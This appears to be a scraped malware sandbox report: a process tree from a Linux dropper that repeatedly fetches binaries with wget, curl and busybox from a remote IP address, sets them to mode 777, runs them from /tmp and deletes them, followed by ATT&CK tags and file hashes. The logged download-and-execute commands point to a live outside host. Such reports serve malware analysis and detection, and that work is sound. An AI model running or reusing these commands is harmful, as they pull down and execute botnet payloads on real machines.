/bin/chmodchmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:946
-
-
/bin/chmodchmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:949
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:950
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:952
-
-
/bin/chmodchmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:958
-
-
/bin/chmodchmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:964
-
-
/bin/chmodchmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:967
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:968
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:970
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97